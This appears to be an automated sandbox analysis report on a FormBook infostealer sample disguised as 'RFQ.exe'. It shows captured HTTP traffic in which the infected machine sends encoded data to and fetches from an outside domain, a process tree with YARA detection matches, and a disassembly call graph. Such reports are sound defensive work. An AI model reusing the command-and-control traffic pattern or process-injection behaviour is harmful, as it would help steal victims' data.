                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjg4MTI3MDAtOTU5NS00ZGIxLWE3YjctMWU5Yjg4MjJhYzhmIiwicGFnZV90aW1lIjoxNzMxNTk1ND


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                  60192.168.2.550039199.59.243.22780
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:43:43.534837961 CET1700OUTPOST /ym43/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.migraine-massages.pro
                                                                                                                                                  Origin: http://www.migraine-massages.pro
                                                                                                                                                  Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6c 4a 35 51 58 77 69 72 6c 2f 35 70 4d 51 62 72 61 75 67 37 51 39 55 71 65 70 76 49 70 6b 75 51 51 4c 68 42 52 58 53 58 48 6c 59 65 59 74 59 52 34 35 6f 70 75 65 2b 6d 6c 75 41 49 62 64 33 44 75 63 6e 2f 64 39 59 54 73 63 77 59 7a 78 34 51 39 64 56 4a 4c 77 42 38 34 45 4f 64 79 64 4b 7a 6a 4b 48 76 37 53 52 78 63 75 53 73 37 4d 2b 64 63 51 72 51 2f 76 32 48 33 78 78 50 6a 6c 4b 62 32 78 4b 39 53 4f 51 34 67 42 53 4f 71 2b 37 34 42 6f 4f 34 7a 53 71 61 42 41 59 4f 39 4c 42 65 52 4f 6d 4d 45 4b 4b 54 6e 4e 5a 4a 30 6d 39 69 68 72 68 53 4a 66 4d 77 50 47 6a 61 73 37 65 65 57 39 49 42 36 37 72 6e 76 67 33 71 4a 39 70 36 2f 47 38 68 67 4a 46 42 5a 79 79 4b 79 58 59 37 72 5a 69 74 75 4d 6b 53 56 52 6c 50 79 46 49 79 43 6c 4c 36 74 77 4e 71 73 4d 54 4d 6c 37 78 6a 6e 4a 56 72 6a 34 39 63 39 34 73 69 6a 45 6d 64 44 65 62 67 46 53 50 45 49 4c 66 73 53 59 4f 56 42 [TRUNCATED]
                                                                                                                                                  Data Ascii: W638b4U=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+elJ5QXwirl/5pMQbraug7Q9UqepvIpkuQQLhBRXSXHlYeYtYR45opue+mluAIbd3Ducn/d9YTscwYzx4Q9dVJLwB84EOdydKzjKHv7SRxcuSs7M+dcQrQ/v2H3xxPjlKb2xK9SOQ4gBSOq+74BoO4zSqaBAYO9LBeROmMEKKTnNZJ0m9ihrhSJfMwPGjas7eeW9IB67rnvg3qJ9p6/G8hgJFBZyyKyXY7rZituMkSVRlPyFIyClL6twNqsMTMl7xjnJVrj49c94sijEmdDebgFSPEILfsSYOVBO3xjfbqvVgqILMV+XdNen1T2RAKwgO61cdKBGTtU6jKl3QmG+QBfkGD4JujR4lTc0z/tuIYBJx+9OFq9JeKqcyyQ4FQGzsVvyUywtcU3v+h1+jVriAlw1EP9YkYcNmC57f/7TmAYd1wIQngAXcZCI/f8fVxjRUZbYHr+iSZqeEjdXfxTrekmDWF8YywgnizENOK3yPs28GzJsz+LeRAuy/UeWHyGyoS0/ImzePlHWYDTVEGoBp4H3RW4w5AHzRClooNsFXPT6YVAYmAxyEX21RQ5L7WKm+9HHcbZgt1LZySYucOYQrXU5XYsS7ZudoazCYeEa9ikEOPIEgf++dUfPNBz6Y4fwxfmTVu1BJNXNj9/OthTFGsLfbAErSC5WcGd6c5oYbL6beXeMGWqoWbjtLvu73dT4K01LSGKzYzu/TnxFJN9PYoqizJkUdMUc/Kk0NZWrDis7MD3Ix65ZGAfVBzdHGGipJ6rJm+FSk6j3jMlwrJAaOEQ3E0gf9co0ibN8BCo6bMbOvgr6Ol28zRZBteIyvNrdyUZuxsEbaBPsISxh5Zu2fG27Z5WzsYElmsZoLHwkGc7IFzzT4lVToRysj/jnXmMWdSASwCHD2CNGYPFa3k9pfU3i5hreXwcoBcWFv2+vGYViAHgKfJLSM6Nb/CBi/CB/rpRC1 [TRUNCATED]
                                                                                                                                                  Nov 14, 2024 15:43:44.225358963 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:43:43 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1154
                                                                                                                                                  x-request-id: ca556c8f-e01a-428f-a3c5-37141bc3340d
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                                  set-cookie: parking_session=ca556c8f-e01a-428f-a3c5-37141bc3340d; expires=Thu, 14 Nov 2024 14:58:44 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                  Nov 14, 2024 15:43:44.225905895 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2E1NTZjOGYtZTAxYS00MjhmLWEzYzUtMzcxNDFiYzMzNDBkIiwicGFnZV90aW1lIjoxNzMxNTk1ND


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                  61192.168.2.550040199.59.243.22780
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:43:46.079344988 CET390OUTGET /ym43/?W638b4U=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRTsdeZatTq9P8nD3DJaYsKbhsyMI+cP4BIi4vfpBrFLN6oA==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.migraine-massages.pro
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:43:46.729651928 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:43:46 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1518
                                                                                                                                                  x-request-id: 0e19bd2f-24b5-4754-a8dd-e7bbc5038796
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hWSW/6myXdAG/dDIsV50Lsy88i4smYJL1sTsm8rM+OGq0dyjg4+2vcZGTg+243wkPTg6NkypZhQn9T0cRTp3Dg==
                                                                                                                                                  set-cookie: parking_session=0e19bd2f-24b5-4754-a8dd-e7bbc5038796; expires=Thu, 14 Nov 2024 14:58:46 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 57 53 57 2f 36 6d 79 58 64 41 47 2f 64 44 49 73 56 35 30 4c 73 79 38 38 69 34 73 6d 59 4a 4c 31 73 54 73 6d 38 72 4d 2b 4f 47 71 30 64 79 6a 67 34 2b 32 76 63 5a 47 54 67 2b 32 34 33 77 6b 50 54 67 36 4e 6b 79 70 5a 68 51 6e 39 54 30 63 52 54 70 33 44 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hWSW/6myXdAG/dDIsV50Lsy88i4smYJL1sTsm8rM+OGq0dyjg4+2vcZGTg+243wkPTg6NkypZhQn9T0cRTp3Dg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                  Nov 14, 2024 15:43:46.729964972 CET971INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGUxOWJkMmYtMjRiNS00NzU0LWE4ZGQtZTdiYmM1MDM4Nzk2IiwicGFnZV90aW1lIjoxNzMxNTk1ND


                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:09:39:07
                                                                                                                                                  Start date:14/11/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\RFQ.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\RFQ.exe"
                                                                                                                                                  Imagebase:0x730000
                                                                                                                                                  File size:1'217'024 bytes
                                                                                                                                                  MD5 hash:ECD96717AC8201E049CFA4CA22E88DEC
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:2
                                                                                                                                                  Start time:09:39:09
                                                                                                                                                  Start date:14/11/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\RFQ.exe"
                                                                                                                                                  Imagebase:0xcb0000
                                                                                                                                                  File size:46'504 bytes
                                                                                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2291393354.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2291056975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2291967315.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:3
                                                                                                                                                  Start time:09:39:14
                                                                                                                                                  Start date:14/11/2024
                                                                                                                                                  Path:C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe"
                                                                                                                                                  Imagebase:0xf40000
                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4572938071.00000000047E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:09:39:20
                                                                                                                                                  Start date:14/11/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Windows\SysWOW64\net.exe"
                                                                                                                                                  Imagebase:0x1b0000
                                                                                                                                                  File size:47'104 bytes
                                                                                                                                                  MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4572018212.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4573259207.0000000003480000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4573144434.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:6
                                                                                                                                                  Start time:09:39:33
                                                                                                                                                  Start date:14/11/2024
                                                                                                                                                  Path:C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe"
                                                                                                                                                  Imagebase:0xf40000
                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4574678267.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:8
                                                                                                                                                  Start time:09:39:45
                                                                                                                                                  Start date:14/11/2024
                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                  Imagebase:0x7ff79f9e0000
                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Disassembly

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:3.9%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                                    Signature Coverage:8.6%
                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                    Total number of Limit Nodes:150
                                                                                                                                                    execution_graph 93683 7a19ba 93688 74c75a 93683->93688 93687 7a19c9 93696 73d7f7 93688->93696 93693 74c865 93694 74c881 93693->93694 93704 74d1fa 48 API calls _memcpy_s 93693->93704 93695 750f0a 52 API calls __cinit 93694->93695 93695->93687 93705 74f4ea 93696->93705 93698 73d818 93699 74f4ea 48 API calls 93698->93699 93700 73d826 93699->93700 93701 74d26c 93700->93701 93736 74d298 93701->93736 93704->93693 93708 74f4f2 __calloc_impl 93705->93708 93707 74f50c 93707->93698 93708->93707 93709 74f50e std::exception::exception 93708->93709 93714 75395c 93708->93714 93728 756805 RaiseException 93709->93728 93711 74f538 93729 75673b 47 API calls _free 93711->93729 93713 74f54a 93713->93698 93715 7539d7 __calloc_impl 93714->93715 93723 753968 __calloc_impl 93714->93723 93735 757c0e 47 API calls __getptd_noexit 93715->93735 93718 75399b RtlAllocateHeap 93718->93723 93727 7539cf 93718->93727 93720 7539c3 93733 757c0e 47 API calls __getptd_noexit 93720->93733 93723->93718 93723->93720 93724 7539c1 93723->93724 93725 753973 93723->93725 93734 757c0e 47 API calls __getptd_noexit 93724->93734 93725->93723 93730 7581c2 47 API calls 2 library calls 93725->93730 93731 75821f 47 API calls 8 library calls 93725->93731 93732 751145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93725->93732 93727->93708 93728->93711 93729->93713 93730->93725 93731->93725 93733->93724 93734->93727 93735->93727 93737 74d28b 93736->93737 93738 74d2a5 93736->93738 93737->93693 93738->93737 93739 74d2ac RegOpenKeyExW 93738->93739 93739->93737 93740 74d2c6 RegQueryValueExW 93739->93740 93741 74d2e7 93740->93741 93742 74d2fc RegCloseKey 93740->93742 93741->93742 93742->93737 93743 7a197b 93748 74dd94 93743->93748 93747 7a198a 93749 74f4ea 48 API calls 93748->93749 93750 74dd9c 93749->93750 93752 74ddb0 93750->93752 93756 74df3d 93750->93756 93755 750f0a 52 API calls __cinit 93752->93755 93755->93747 93757 74df46 93756->93757 93759 74dda8 93756->93759 93788 750f0a 52 API calls __cinit 93757->93788 93760 74ddc0 93759->93760 93761 73d7f7 48 API calls 93760->93761 93762 74ddd7 GetVersionExW 93761->93762 93789 736a63 93762->93789 93764 74de1a 93800 74dfb4 93764->93800 93770 7a24c8 93772 74dea4 GetCurrentProcess 93817 74df5f LoadLibraryA GetProcAddress 93772->93817 93773 74df31 GetSystemInfo 93778 74df0e 93773->93778 93774 74dee3 93811 74e00c 93774->93811 93777 74debb 93777->93773 93777->93774 93780 74df21 93778->93780 93781 74df1c FreeLibrary 93778->93781 93780->93752 93781->93780 93782 74df29 GetSystemInfo 93785 74df03 93782->93785 93783 74def9 93814 74dff4 93783->93814 93785->93778 93787 74df09 FreeLibrary 93785->93787 93787->93778 93788->93759 93790 736adf 93789->93790 93791 736a6f __wsetenvp 93789->93791 93831 73b18b 93790->93831 93793 736ad7 93791->93793 93794 736a8b 93791->93794 93830 73c369 48 API calls 93793->93830 93818 736b4a 93794->93818 93797 736a95 93821 74ee75 93797->93821 93799 736ab6 _memcpy_s 93799->93764 93801 74dfbd 93800->93801 93802 73b18b 48 API calls 93801->93802 93803 74de22 93802->93803 93804 736571 93803->93804 93805 73657f 93804->93805 93806 73b18b 48 API calls 93805->93806 93807 73658f 93806->93807 93807->93770 93808 74df77 93807->93808 93843 74df89 93808->93843 93847 74e01e 93811->93847 93815 74e00c 2 API calls 93814->93815 93816 74df01 GetNativeSystemInfo 93815->93816 93816->93785 93817->93777 93819 74f4ea 48 API calls 93818->93819 93820 736b54 93819->93820 93820->93797 93823 74f4ea __calloc_impl 93821->93823 93822 75395c __crtGetStringTypeA_stat 47 API calls 93822->93823 93823->93822 93824 74f50c 93823->93824 93825 74f50e std::exception::exception 93823->93825 93824->93799 93835 756805 RaiseException 93825->93835 93827 74f538 93836 75673b 47 API calls _free 93827->93836 93829 74f54a 93829->93799 93830->93799 93832 73b1a2 _memcpy_s 93831->93832 93833 73b199 93831->93833 93832->93799 93833->93832 93837 73bdfa 93833->93837 93835->93827 93836->93829 93838 73be0a _memcpy_s 93837->93838 93839 73be0d 93837->93839 93838->93832 93840 74f4ea 48 API calls 93839->93840 93841 73be17 93840->93841 93842 74ee75 48 API calls 93841->93842 93842->93838 93844 74dea0 93843->93844 93845 74df92 LoadLibraryA 93843->93845 93844->93772 93844->93777 93845->93844 93846 74dfa3 GetProcAddress 93845->93846 93846->93844 93848 74def1 93847->93848 93849 74e027 LoadLibraryA 93847->93849 93848->93782 93848->93783 93849->93848 93850 74e038 GetProcAddress 93849->93850 93850->93848 93851 733742 93852 73374b 93851->93852 93853 733769 93852->93853 93854 7337c8 93852->93854 93891 7337c6 93852->93891 93858 733776 93853->93858 93859 73382c PostQuitMessage 93853->93859 93856 7a1e00 93854->93856 93857 7337ce 93854->93857 93855 7337ab DefWindowProcW 93893 7337b9 93855->93893 93900 732ff6 16 API calls 93856->93900 93860 7337d3 93857->93860 93861 7337f6 SetTimer RegisterWindowMessageW 93857->93861 93863 7a1e88 93858->93863 93864 733781 93858->93864 93859->93893 93865 7a1da3 93860->93865 93866 7337da KillTimer 93860->93866 93868 73381f CreatePopupMenu 93861->93868 93861->93893 93915 774ddd 60 API calls _memset 93863->93915 93869 733836 93864->93869 93870 733789 93864->93870 93874 7a1da8 93865->93874 93875 7a1ddc MoveWindow 93865->93875 93896 733847 Shell_NotifyIconW _memset 93866->93896 93867 7a1e27 93901 74e312 346 API calls Mailbox 93867->93901 93868->93893 93898 74eb83 53 API calls _memset 93869->93898 93878 7a1e6d 93870->93878 93879 733794 93870->93879 93872 7a1e9a 93872->93855 93872->93893 93883 7a1dcb SetFocus 93874->93883 93884 7a1dac 93874->93884 93875->93893 93878->93855 93914 76a5f3 48 API calls 93878->93914 93880 7a1e58 93879->93880 93881 73379f 93879->93881 93913 7755bd 70 API calls _memset 93880->93913 93881->93855 93902 733847 Shell_NotifyIconW _memset 93881->93902 93882 733845 93882->93893 93883->93893 93884->93881 93886 7a1db5 93884->93886 93885 7337ed 93897 73390f DeleteObject DestroyWindow Mailbox 93885->93897 93899 732ff6 16 API calls 93886->93899 93891->93855 93894 7a1e4c 93903 734ffc 93894->93903 93896->93885 93897->93893 93898->93882 93899->93893 93900->93867 93901->93881 93902->93894 93904 735027 _memset 93903->93904 93916 734c30 93904->93916 93907 7350ac 93909 7a3d28 Shell_NotifyIconW 93907->93909 93910 7350ca Shell_NotifyIconW 93907->93910 93920 7351af 93910->93920 93912 7350df 93912->93891 93913->93882 93914->93891 93915->93872 93917 734c44 93916->93917 93918 7a3c33 93916->93918 93917->93907 93942 775819 61 API calls _W_store_winword 93917->93942 93918->93917 93919 7a3c3c DestroyIcon 93918->93919 93919->93917 93921 7352a2 Mailbox 93920->93921 93922 7351cb 93920->93922 93921->93912 93943 736b0f 93922->93943 93925 7351e6 93927 736a63 48 API calls 93925->93927 93926 7a3ca1 LoadStringW 93929 7a3cbb 93926->93929 93928 7351fb 93927->93928 93928->93929 93930 73520c 93928->93930 93931 73510d 48 API calls 93929->93931 93932 7352a7 93930->93932 93933 735216 93930->93933 93936 7a3cc5 93931->93936 93957 736eed 93932->93957 93948 73510d 93933->93948 93939 735220 _memset _wcscpy 93936->93939 93961 73518c 93936->93961 93938 7a3ce7 93940 73518c 48 API calls 93938->93940 93941 735288 Shell_NotifyIconW 93939->93941 93940->93939 93941->93921 93942->93907 93944 74f4ea 48 API calls 93943->93944 93945 736b34 93944->93945 93946 736b4a 48 API calls 93945->93946 93947 7351d9 93946->93947 93947->93925 93947->93926 93949 73511f 93948->93949 93950 7a1be7 93948->93950 93971 73b384 93949->93971 93980 76a58f 48 API calls _memcpy_s 93950->93980 93953 73512b 93953->93939 93954 7a1bf1 93955 736eed 48 API calls 93954->93955 93956 7a1bf9 Mailbox 93955->93956 93958 736f00 93957->93958 93959 736ef8 93957->93959 93958->93939 93986 73dd47 48 API calls _memcpy_s 93959->93986 93962 735197 93961->93962 93963 7a1ace 93962->93963 93964 73519f 93962->93964 93966 736b4a 48 API calls 93963->93966 93987 735130 93964->93987 93968 7a1adb __wsetenvp 93966->93968 93967 7351aa 93967->93938 93969 74ee75 48 API calls 93968->93969 93970 7a1b07 _memcpy_s 93969->93970 93972 73b392 93971->93972 93979 73b3c5 _memcpy_s 93971->93979 93973 73b3b8 